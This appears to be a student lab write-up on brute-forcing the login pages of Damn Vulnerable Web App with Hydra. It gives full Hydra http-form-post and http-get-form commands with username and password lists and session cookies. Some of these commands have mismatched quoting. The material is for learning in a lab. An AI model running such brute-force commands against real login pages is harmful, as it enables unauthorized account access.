top of page

Damn Vulnerable Web APP Password Cracking with HYDRA

Introduction:

In the realm of cybersecurity, understanding vulnerabilities is crucial for fortifying digital systems against potential threats. One such avenue is password security, where inadequate measures can lead to unauthorized access. The Damn Vulnerable Web App (DVWA) serves as a practical platform for exploring these vulnerabilities in a controlled environment. In this project, we delve into password cracking using Hydra, a powerful tool bundled with Kali Linux.

This is a paragraph where you can add any information you want to share with website visitors. Click here to edit the text, change the font and make it your own.

Part 1

  1. Hydra is an application that was in Kali pre-installation. Type hydra in the CLI it will display the help section

image.png

2. The syntax becomes harder with different websites. Type Hydra 10.0.1.66
We will send post request :hydra 10.0.1.66 http-form-post "/dvwa/login.php "

image.png

3. Next we have to find name for user name for the second argument. The username field is username hydra 10.0.1.66 http-form-post "/dvwa/login.php :username=^USER^" We user hydra syntax for user for hydra to put any username in that field.

image.png

4.The name for the password field so we use command hydra 10.0.1.66 http-form-post "/dvwa/login.php :username=^USER^&password=^PASS^"  passwords in our list will get passed where pass is going .

5.We also need to simulate login button hydra 10.0.1.66 http-form-post "/dvwa/login.php :username=^USER^&password=^PASS^&Login=submit:Login Failed"

image.png

6. Also we need to differentiate incorrect and user password we put that at the end in order for the string to hydra 10.0.1.66 http-form-post "/dvwa/login.php :username=^USER^&password=^PASS^&Login=submit:Login Failed -L username.txt -P password.txt
7.    -L is the list
8.    -P for password list
9.    Nano username.txt
10.    Nano password.txt
11.   run command  hydra 10.0.1.66 http-form-post "/dvwa/login.php :username=^USER^&password=^PASS^&Login=submit:Login Failed -L username.txt -P password.txt

Part 2

1.We are going to use Hydra to attack the brute force section of the dvwa website.

 

The user names and passwords are being sent with a ping using a get method. We have to use  http-get-form

image.png
image.png

2. Hydra 10.0.1.66 http-get-form ""


3.  We have to specifiy path to page

 


4. Hydra 10.0.1.66 http-get-form "dvwa/vulnerabilities/brute/:"

 


5. Separate the the form part where we need to specify usernaem and password. We must also look at the source file.

 

 


6.  run Hydra 10.0.1.66 http-get-form "dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."-L username.txt -P password.txt

image.png

7 .Sometimes the command will not work we will need more arguments

 


8. Run this command :Hydra 10.0.1.66 http-get-form

"dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H-Cookie: security=low; PHPSESSID=52e83e1ae2ad5e7aa2a10a93cb3c9676" -L username.txt -P password.txt
 

9.The command above syntax no longer works and has to be modified : hydra 10.0.1.66 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=low; PHPSESSID=2e65d4564c782005bb15e684783e3c99:Username and/or password incorrect." -L usernames.txt -P passwords.txt

 



 

image.png

10.  hydra [TARGET_ADDR] http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=low; PHPSESSID=SESSION_ID:Username and/or password incorrect." -L usernames.txt -P passwords.txt

image.png

11. We then see that only one password worked.

 Lessons Learned

  1. Hydra Utility: Hydra, an integral part of the Kali Linux distribution, is a versatile tool for performing password attacks. Its capabilities extend to various protocols and authentication mechanisms, making it a valuable asset in penetration testing.

  2. Help Section Exploration: Before diving into action, it's essential to familiarize oneself with the tool's functionalities. Typing 'hydra' reveals a comprehensive help section, providing insights into the available options and syntax.

  3. Understanding Syntax: The syntax for Hydra commands can vary depending on the target website's structure. This necessitates careful examination and adaptation of the command parameters to suit the specific scenario.

  4. HTTP Form-Post Attack: Cracking passwords through HTTP form-post requests involves crafting Hydra commands tailored to mimic user login attempts. Key elements include specifying the target IP, login page, username, password, and the login button submission.

  5. Differentiating Responses: Distinguishing between successful and failed login attempts is crucial. Hydra facilitates this by allowing users to define strings indicative of login success or failure, enabling efficient password enumeration.

  6. List Specification: Hydra enables the use of external lists for usernames and passwords, enhancing the scalability and effectiveness of brute-force attacks. Proper management of these lists is essential for maximizing success rates.

  7. HTTP Get-Form Attack: In scenarios where login credentials are transmitted via HTTP GET requests, Hydra's http-get-form module becomes instrumental. Similar principles apply, but adjustments are made to accommodate the distinctive request format.

  8. Handling Additional Parameters: Some scenarios may require additional parameters to ensure successful authentication. Understanding how to incorporate these parameters into Hydra commands is essential for overcoming such challenges.

  9. Source File Examination: Analyzing the source code of web pages can provide valuable insights into the structure of HTTP requests, aiding in the formulation of effective Hydra commands.

  10. Security Considerations: Adhering to ethical standards and legal obligations is paramount when conducting security assessments. Usage of tools like Hydra should be confined to authorized testing environments to prevent misuse and potential legal repercussions.

bottom of page